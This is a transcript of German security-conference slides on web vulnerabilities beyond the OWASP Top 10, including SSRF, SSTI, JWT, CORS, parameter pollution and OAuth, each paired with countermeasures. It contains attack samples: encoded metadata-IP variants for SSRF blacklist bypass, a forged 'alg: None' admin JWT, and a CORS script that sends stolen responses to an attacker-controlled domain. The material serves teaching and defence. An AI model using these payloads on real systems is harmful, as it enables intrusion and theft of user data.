Beyond OWASP Top 10 - Java Forum Stuttgart · 2019-07-05 · Burp Suite Intruder, sortiert nach...

Post on 23-Jun-2020

1 views 0 download

Transcript of Beyond OWASP Top 10 - Java Forum Stuttgart · 2019-07-05 · Burp Suite Intruder, sortiert nach...

4. Juli 2019

Beyond OWASP Top 10

Über welche Schwachstellen werden Webanwendungen

und Schnittstellen angegriffen, wenn die wesentlichen

Grundlagen der OWASP Top 10 abgesichert sind?

Frank Ully, Senior Penetration Tester & Security Consultant

2 © 2019 Oneconsult AG

ONECONSULT

3 © 2019 Oneconsult AG

AGENDA

Einführung

OWASP

Top 10

Risiken

Beyond

OWASP

Top 10

Fazit Weiterführende

Quellen

© 2019 Oneconsult AG

EinführungOWASP Top 10

5 © 2019 Oneconsult AG

RISIKEN IN WEBANWENDUNGEN

Bedrohungs-quellen

Schwach-stellen

Auswirkungentechnisch

Auswirkungen auf Unternehmen

Angriffs-vektoren

Sicherheits-maßnahmen

6 © 2019 Oneconsult AG

Angriffsvektoren

Bedrohungs-quellen

Ausnutzbarkeit

Anwendungs-spezifisch

einfach

durchschnittlich

schwierig

Schwachstelle

Verbreitung Auffindbarkeit

sehr häufig einfach

häufig durchschnittlich

selten schwierig

Auswirkungen

Auswirkungentechnisch

Auswirkungen Unternehmen

schwerwiegend

Daten- & Geschäfts-spezifischmittel

gering

BEWERTUNG VON RISIKEN IN WEBANWENDUNGEN

3

2

1

3

2

1

3

2

1

3

2

1

7 © 2019 Oneconsult AG

ÜBERSICHT ÜBER DIE RISIKEN DER OWASP TOP 10

12345

Injection

Fehler in Authentifizierung

Verlust der Vertraulichkeitsensibler Daten

XML External Entities

Fehler in ZugriffskontrolleFehlkonfiguration

Cross-Site Scripting

Unsichere Deserialisierung

Komponenten mit Schwachstellen

Unzureichendes Logging

© 2019 Oneconsult AG

Umgehung von Rate Limiting / Request Header

9 © 2019 Oneconsult AG

ÜBERSICHT

Beschreibung

→ Sicherheit hängt auch von Konfiguration ab; es werden unsichere (Standard-) Einstellungen verwendet

→ Angreifer können durch fehlendes oder nicht überall konfiguriertes Rate Limiting – oder leicht umgehbares Rate Limiting – etwa Brute-Force-Angriffe, z.B. auf Benutzerkonten, bis hin zu Denial-of-Service-Angriffen ausführen

Risikobewertung

3

3

3

2

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

10 © 2019 Oneconsult AG

UMGEHUNG VON RATE LIMITING

12 © 2019 Oneconsult AG

FOLGE

Brute-Force-Angriffe werden nicht verhindert

Informationsabflüsse

Unautorisierter Zugriff auf Daten

Denial-of-Service für Nutzer mit bekannten IP-Adressen

FINDEN

→Mehrere Zugriffe auf die Anwendung durchführen

▪ unauthentisiert

▪ authentisiert

▪ mit falschen Zugangsdaten

→Header einfügen

▪ veränderte Antworten beobachten

▪ veränderte Antwortzeiten beobachten

14 © 2019 Oneconsult AG

MASSNAHMEN

Rate Limiting implementieren (429 Too Many Requests)

Benutzereingaben niemals trauen

Standard-Komponenten überprüfen

X-Forwarded-For, True-Client-IP, X-Real-IP, Referer, …

X-Host, X-Forwarded-Host, X-Original-URL, X-Rewrite-URL

© 2019 Oneconsult AG

{ }

Server-Side Template Injection

16 © 2019 Oneconsult AG

ÜBERSICHT

→ Benutzereingaben werden in ein (serverseitiges) Template eingefügt, ohne Metazeichen zu entfernen oder die Korrektheit zu überprüfen

→ Angreifer können internen Zustand auslesen, manipulieren und etwa ihre Privilegien erweitern oder Code auf dem Server ausführen

Beschreibung Risikobewertung

2

2

2

3

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

17 © 2019 Oneconsult AG

URSACHE

<html>…Hallo ${name}!…

</html>

Tem

pla

te

…data.name = "Frank";…

Java

Ob

jek

te

Template Engine

<html>…Hallo Frank!…

</html>

Output

18 © 2019 Oneconsult AG

SERVER-SIDE TEMPLATE INJECTION

{ }

20 © 2019 Oneconsult AG

FOLGE

Cross-Site Scripting

Sitzungsdaten auslesen und manipulieren

Remote Code Execution

Client-seitig: Ausbrechen aus Sandbox

FINDEN

→ Ausdruck finden

▪ {{ }}▪ ${ }▪ #{ }▪ <% %>▪ ` `

→ Mathematik einfügen

▪ 2*2▪ 3-1

→ Reflektiertes XSS könnte Template Injection sein

→ Eingesetzte Technologien ermitteln (Wappalyzer, BuiltWith)

→ Tplmap

22 © 2019 Oneconsult AG

MASSNAHMEN

Benutzereingaben in Templates vermeiden

Einfache Template-Engine verwenden

Eingabevalidierung, Ausgabe über Templatefunktion

Templates nicht doppelt evaluieren

Sandboxing in gehärtetem Docker-Container

© 2019 Oneconsult AG

Server-Side Request Forgery

24 © 2019 Oneconsult AG

ÜBERSICHT

→ Anwendung führt einen Request aus, dessen Ziel der Benutzer ganz oder teilweise vorgeben kann

→ Angreifer können interne Dienste erreichen, das interne Netzwerk scannen und sensible interne Daten auslesen. Gegebenenfalls sind reflektierte XSS-Angriffe oder das Ausführen von Code auf einem Server möglich

Beschreibung Risikobewertung

2

2

2

3

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

25 © 2019 Oneconsult AG

URSACHE

Angreifer

(Client)

Webserver Anderer Server

sendet Request

sendet Request

26 © 2019 Oneconsult AG

FOLGE

Angreifer

(Client)

Anderer Server

Webserver

manipulierter Original-Request

A

B

bösartiger Request

B

FINDEN

URSACHE

FINDEN

FINDEN

30 © 2019 Oneconsult AG

FOLGE

Firewalls umgehen

Internes Netzwerk erreichen und ausforschen

Quell-IP verschleiern

ggf. Cross-Site Scripting oder Remote Code Execution

FINDEN

→ Tool-unterstützt

▪ Burp Suite Intruder, sortiert nach Antwortgröße

▪ Burp Suite Collaborator

→ Egress-Firewall-Logs

→ URL / IP in Request?

▪ anderer Host

▪ Loopback-Adresse

▪ interne IP-Adresse

▪ anderes Protokoll

▪ anderer Port

▪ extern umleiten über 301 Redirect an intern

32 © 2019 Oneconsult AG

KEINE MASSNAHME: BLACKLISTING

169.254.43518

2852039166

169.254.169.254

169.254.169.254.xip.io 1ynrnhl.xip.io (base36)

metadata.angreifer.de

425.510.425.510

7147006462

0xA9.0xFE.0xA9.0xFE

0xa9fea9fe

0x414141410a9fea9fe0 0251.0376.0251.0376

33 © 2019 Oneconsult AG

MASSNAHMEN

Eingabevalidierung

Whitelisting (kein Blacklisting!), auch für Protokoll und Port

Internes, granulares Firewalling, auch für Localhost

IP des Hosts vor Zugriff auflösen. Intern?

Login vor interne Dienste

© 2019 Oneconsult AG

JSON Web Token

35 © 2019 Oneconsult AG

ÜBERSICHT

→ JSON Web Token (JWT) sind unzureichend kryptographisch gesichert, oder die Implementierung oder Konfiguration der Prüfung ist fehlerhaft

→ Angreifer können Daten für Authentifizierung und Autorisierung manipulieren und etwa ihre Privilegien erweitern

Beschreibung Risikobewertung

3

1

2

3

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

36 © 2019 Oneconsult AG

{ "alg": "HS256",

"typ": "JWT" }

He

ad

er

{ "sub": "1234567890",

"name": "John Doe",

"admin": false,

"iat": 1561732307,

"exp": 1593354707 }

Pa

ylo

ad

HMACSHA256(

base64UrlEncode(header) + "." +

base64UrlEncode(payload),

"geheimnis")Sig

na

tur

HINTERGRUND

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE1NjE3MzIzMDcsImV4cCI6MTU5MzM1NDcwN30.

H5T1x1voI9a7FFQ4HGWA8mpMDsLMpeCwQBToU-PSBtA

37 © 2019 Oneconsult AG

{ "alg": "None",

"typ": "JWT" }

He

ad

er

{ "sub": "1234567890",

"name": "John Doe",

"admin": true,

"iat": 1561732307,

"exp": 1593354707 }

Pa

ylo

ad

Sig

na

tur

URSACHE 1

eyJhbGciOiAiTm9uZSIsInR5cCI6ICJKV1QifQo.

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTU2MTczMjMwNywiZXhwIjoxNTkzMzU0NzA3fQ.

38 © 2019 Oneconsult AG

URSACHE 2

String token = "eyJhbGciOi…PSBtA";

try

{

DecodedJWT jwt =

JWT.decode(token);

}

catch (JWTDecodeException ex)

{

// Invalid token

}

try

{

Algorithm alg =

Algorithm.HMAC256("geheimnis");

JWTVerfier ver =

JWT.require(alg).build();

DecodedJWT jwt =

ver.verify(token);

}

catch (JWTVerificationException ex)

{

// Invalid signature/claim

}

Dekodierung Signaturverifikation

Quelle: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls

39 © 2019 Oneconsult AG

FOLGE

Symmetrisches Geheimnis kompromittiert für alle Dienste

Fälschen von Token

Horizontale Privilegienerweiterung

Vertikale Privilegienerweiterung

FINDEN

→ Dynamisch (Black Box)

▪ Signatur manipulieren

▪ Header manipulieren („Null“ und „null“), Signatur entfernen

▪ Header manipulieren („RS256“ -> „HS256“), neu signieren

→ Statisch (White Box)

▪ Validieren statt nur dekodieren

▪ Stärke des Geheimnisses

41 © 2019 Oneconsult AG

MASSNAHMEN

Entscheiden für symmetrisch oder asymmetrisch

Starke Schlüssel verwenden und sicher verwahren

Signatur überprüfen, mit festgelegtem Algorithmus

Kurze Gültigkeitsdauer der Token

IETF (Draft) JSON Web Token Best Current Practices

© 2019 Oneconsult AG

Cross-Origin Resource Sharing

://abc

://xyz

43 © 2019 Oneconsult AG

ÜBERSICHT

→ Anwendung setzt Single Origin Policy (SOP) über Cross-Origin Resource Sharing (CORS) Antwortheader nicht nur für bestimmte Anfragequellen außer Kraft

→ Angreifer können ein Opfer auf eine von ihnen kontrollierte Website locken und im Namen des Opfers auf die entfernte API zugreifen

Beschreibung Risikobewertung

2

2

3

2

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

44 © 2019 Oneconsult AG

HINTERGRUND

app.beispiel.de

sso.beispiel.de

Seite laden

var xhr = new XMLHttpRequest();

xhr.open('GET', 'https://sso.beispiel.de/requestApiKey', false);

xhr.withCredentials = true;

xhr.send();

Origin: https://app.beispiel.deCookie: JWT=…

Daten abfragen

Access-Control-Allow-Origin:https://app.beispiel.de

Access-Control-Allow-Credentials: true

Quelle: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls

URSACHE

46 © 2019 Oneconsult AG

FOLGE

keinbeispiel.de beispiel.de

Browser des Opfers

besucht

gibt bösartiges Skript zurück

sendet bösartige Anfragemit Cookies und Origin Header

gibt geheime Datenund CORS Header zurück

untersucht CORS Header:

erlauben?

JA:Browser gibt

Daten an Skript

NEIN:Browser gibt Antwort nicht

weiter

var xhr = new XMLHttpRequest();xhr.open('GET',

'https://beispiel.de/data', true);

xhr.withCredentials = true;xhr.onload = function () {location = '//keinbeispiel.de/log?

response=' + xhr.responseText;};xhr.send();

GET /data HTTP/1.1Host: beispiel.deOrigin: https://keinspiel.de/Cookie: JWT=...

HTTP/1.1 200 OKAccess-Control-Allow-Origin:https://keinbeispiel.de

Access-Control-Allow-Credentials:true

--{"id":12345, "name":"Tom", "surname":"Kummer", "account":98765}

Quelle: https://www.bedefended.com/papers/cors-security-guide

FINDEN

→ Antworten mit „Origin“-Header finden oder „Origin“-Header einfügen

→ „Origin“-Header verändern und neue Antworten beobachten

→ CORScanner

→ Allow-Credentials?

▪ Reflektiert und „null“ ausnutzbar

→ Kein Allow-Credentials?

▪ Reflektiert, „null“, „*“ausnutzbar

48 © 2019 Oneconsult AG

MASSNAHMEN

Standard-Konfiguration überprüfen

Vermeiden, zumindest mit Credentials, wenn nicht nötig

Strikte Whitelist des Origins, nur sichere Protokolle

Header „Access-Control-Allow-Methods: …“ einschränken

Header „Vary: Origin“ setzen

© 2019 Oneconsult AG

HTTP Parameter Pollution

? a=b&a=c

50 © 2019 Oneconsult AG

ÜBERSICHT

→ Infrastruktur, Anwendung oder nachgelagerte Anwendungen gehen unerwartet oder unterschiedlich mit doppelt eingefügten Parametern um

→ Angreifer können Sicherheitsmechanismen oder Prüfungen zur Zugriffskontrolle umgehen, oder Benutzer dazu bringen, unerwartete Aktionen auszuführen

Beschreibung Risikobewertung

3

2

2

2

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

51 © 2019 Oneconsult AG

URSACHE: …?par=1&par=2

TECHNOLOGIE PARSING BEISPIEL

ASP.NET/IIS alle par=1,2

ASP/IIS alle par=1,2

PHP/Apache letztes par=2

PHP/Zeus letztes par=2

JSP, Servlet/Apache Tomcat erstes par=1

JSP, Servlet/Oracle Server 10g erstes par=1

JSP, Servlet Jetty erstes par=1

IBM Lotus Domino letztes par=2

IBM HTTP Server erstes par=1

mod_perl, libapreq2/Apache erstes par=1

TECHNOLOGIE PARSING BEISPIEL

Perl CGI/Apache erstes par=1

mod_perl,lib???/Apache Array ARRAY(0x…)

mod_wsgi (Python)/Apache erstes par=1

Python/Zope Array ['1','2']

IceWarp letztes par=2

AXIS 2400 alle par=1,2

Linksys Wireless-G Camera letztes par=2

Ricoh Aficio 1022 Printer erstes par=1

webcamXP RPO erstes par=1

DBMan alle par=1~~2

Quelle: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

52 © 2019 Oneconsult AG

FOLGE: SERVER-SEITIG

Trigger URL

/index.aspx?p=1&p=2

Frontend Backend

53 © 2019 Oneconsult AG

HTTP PARAMETER POLLUTION

? a=b&a=c

55 © 2019 Oneconsult AG

FOLGE

Zugreifen auf oder Verändern von Daten unautorisiert

Umgehen von Eingabevalidierung

Umgehen von Web Application Firewalls

Durchführen von unbeabsichtigten Aktionen

FINDEN

→ An Request Parameter doppelt einfügen mit unterschiedlichem Wert

→ Welcher Wert wurde genommen?

→ Wert an verschiedenen Stellen einfügen

→ GET, POST, …

→ Links / Eingabefelder untersuchen auf Rückgabe von Parametern

→ Besonders bei Übergabe an andere Dienste

57 © 2019 Oneconsult AG

MASSNAHMEN

Sprachverhalten kennen

Parameter gezielt auswählen

Eingabevalidierung (doppelte Parameter entfernen)

Ausgabekodierung

Web Application Firewall

© 2019 Oneconsult AG

OAuth

59 © 2019 Oneconsult AG

ÜBERSICHT

→ In einem OAuth Flow sind Authorization Server oder Resource Server unzureichend vor Manipulation geschützt

→ Angreifer können Zugangsdaten eines Opfers wiederverwenden oder abfangen; oder von ihnen kontrollierte Ressourcen mit dem Konto oder der Sitzung eines Opfers verknüpfen (Cross-Site Request Forgery, CSRF)

Beschreibung Risikobewertung

2

2

2

2

Ausnutzbarkeit

Verbreitung

Auffindbarkeit

Tech. Auswirkung

60 © 2019 Oneconsult AG

HINTERGRUND

Anmelde-Request

Umleitung zu Auth Server

Temporärer Authorization Code

Autorisierungs-Request

Request mit Authorization Code

Token Request

Access Token

Datenzugriff mit Access Token

61 © 2019 Oneconsult AG

FOLGEN

Phishing-Mail mit Link

Temporärer Authorization Code

Autorisierungs-Request

AuthorizationCode

Request mit Authorization Code

Token Request

Access Token

Datenzugriff mit Access Token

Ressource

Seite mit Ressource

FINDEN

→ (Regelmäßige) Tests

▪ von Authorization Servern

▪ von Resource Servern

63 © 2019 Oneconsult AG

MASSNAHMEN

Passenden Flow / Grant-Typ wählen (nicht mehr Implicit)

Kurzlebige und einmalige Codes und Token ausgeben

State / Proof Key for Code Exchange (PKCE) verwenden

Authorization S.: redirect_URI registrieren und validieren

IETF (Draft) OAuth 2.0 Security Best Current Practice

© 2019 Oneconsult AG

Fazit

65 © 2019 Oneconsult AG

HAUPTSÄCHLICHE QUELLEN UND ABHILFE

Interpreter und Injektionen

Zu viel Vertrauen (besonders in Client)

Komplexität (Fehlkonfi-guration, JWT, OAuth)

Fehlender Schutz in der Tiefe

Eingabevalidierung

Ausgabekodierung

Serverseitige Validierung

Autorisierung bei jedem Zugriff

Standardisierung(aber: Einstellungen prüfen)

Automatisierung (in Deployment und Überprüfung)

Abschottung der eigenen Infrastruktur untereinander

66 © 2019 Oneconsult AG

FAZIT

68 © 2019 Oneconsult AG

→ Frank Ully

Senior Penetration Tester & Security ConsultantOneconsult Deutschland

+49 89 248820 623+49 151 588034 81

frank.ully@oneconsult.com

DANKE FÜR IHRE AUFMERKSAMKEIT!

© 2019 Oneconsult AG69

© 2019 Oneconsult AG

Weiterführende Quellen

71 © 2019 Oneconsult AG

→ Yaworksi, Peter (2018): Web Hacking 101https://leanpub.com/web-hacking-101

→ Stuttard, Dafydd / Pinto, Marcus (2007): The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, 2nd Edition

→ Schäfers, Tim Philipp (2018): Hacking im Web: Denken Sie wie ein Hacker und schließen Sie die Lücken in Ihren Webapplikationen, 2. Auflage

BÜCHER

WEITERFÜHRENDE QUELLEN

72 © 2019 Oneconsult AG

→ OWASP Juice Shop (absichtlich verwundbare Applikation auf Basis von Node.js und Angular):https://www.owasp.org/index.php/OWASP_Juice_Shop_Project

→ OWASP Top 10 2017 auf Deutsch:https://www.owasp.org/index.php/Germany/Projekte/Top_10

→ OWASP Top 10 Rohdaten auf Github:https://github.com/OWASP/Top10

→ OWASP Top 10 für Entwickler:https://www.owasp.org/index.php/Category:OWASP_Top_10_fuer_Entwickler

OWASP I

WEITERFÜHRENDE QUELLEN

73 © 2019 Oneconsult AG

→ OWASP ASVS (Application Security Verification Standard):https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project

→ OWASP Top 10 Proactive Controls for Developers:https://www.owasp.org/index.php/OWASP_Proactive_Controls

→ OWASP Testing Guide:https://www.owasp.org/index.php/OWASP_Testing_Project

→ OWASP Code Review Guide:https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project

OWASP II

WEITERFÜHRENDE QUELLEN

74 © 2019 Oneconsult AG

→ Security Rule Zero: A Warning about X-Forwarded-For:https://www.f5.com/company/blog/security-rule-zero-a-warning-about-x-forwarded-for

→ Cracking the lens: targeting HTTP's hidden attack-surface:https://portswigger.net/blog/cracking-the-lens-targeting-https-hidden-attack-surface

→ How I accidentally framed myself for a hacking frenzy:https://portswigger.net/blog/how-i-accidentally-framed-myself-for-a-hacking-frenzy

→ Practical Web Cache Poisoning:https://portswigger.net/blog/practical-web-cache-poisoning

X-FORWARDED-FOR / REQUEST HEADER

WEITERFÜHRENDE QUELLEN

75 © 2019 Oneconsult AG

→ Payloads All The Things – Server Side Template Injection:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

→ Server-Side Template Injection:https://portswigger.net/blog/server-side-template-injection

→ Tplmap:https://github.com/epinna/tplmap

SERVER-SIDE TEMPLATE INJECTION

WEITERFÜHRENDE QUELLEN

76 © 2019 Oneconsult AG

→ Payloads All The Things – Server Side Request Forgery:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

→ SSRF bible:https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit

→ SSRF (Server Side Request Forgery) testing resources:https://github.com/cujanovic/SSRF-Testing

→ PortSwigger Web Security Academy:https://portswigger.net/web-security/ssrf

SERVER-SIDE REQUEST FORGERY

WEITERFÜHRENDE QUELLEN

77 © 2019 Oneconsult AG

→ Payloads All The Things – JSON Web Token:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token

→ The hard parts of JWT security nobody talks about:https://www.pingidentity.com/en/company/blog/posts/2019/jwt-security-nobody-talks-about.html

→ JSON Web Token Best Current Practices:https://tools.ietf.org/html/draft-ietf-oauth-jwt-bcp-06

JSON WEB TOKEN

WEITERFÜHRENDE QUELLEN

78 © 2019 Oneconsult AG

→ Exploiting CORS misconfigurations for Bitcoins and bounties:https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties

→ Authoritative guide to CORS (Cross-Origin Resource Sharing) for REST APIs:https://www.moesif.com/blog/technical/cors/Authoritative-Guide-to-CORS-Cross-Origin-Resource-Sharing-for-REST-APIs/

→ The Complete Guide to CORS (In)Security:https://www.bedefended.com/papers/cors-security-guide

→ CORScanner:https://github.com/chenjj/CORScanner

CROSS-ORIGIN RESOURCE SHARING

WEITERFÜHRENDE QUELLEN

79 © 2019 Oneconsult AG

→ Testing for HTTP Parameter pollution (OTG-INPVAL-004):https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)

→ HTTP Parameter Pollution:https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

→ HTTP Parameter Pollution Vulnerabilities:https://www.ikkisoft.com/stuff/HPParticle.pdf

HTTP PARAMETER POLLUTION

WEITERFÜHRENDE QUELLEN

80 © 2019 Oneconsult AG

→ Payloads All The Things – OAuth:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth

→ OAuth 2.0 Security Best Current Practice Overview:https://danielfett.de/2019/03/04/new-oauth-security-recommendations/

→ Damn Vulnerable OAuth 2.0 Application – Tester:https://github.com/koenbuyens/Damn-Vulnerable-OAuth-2.0-Applications/blob/master/authorizationcode_tester.md#checklist

→ Damn Vulnerable OAuth 2.0 Application – Developer:https://github.com/koenbuyens/Damn-Vulnerable-OAuth-2.0-Applications/blob/master/authorizationcode_developer.md

OAUTH

WEITERFÜHRENDE QUELLEN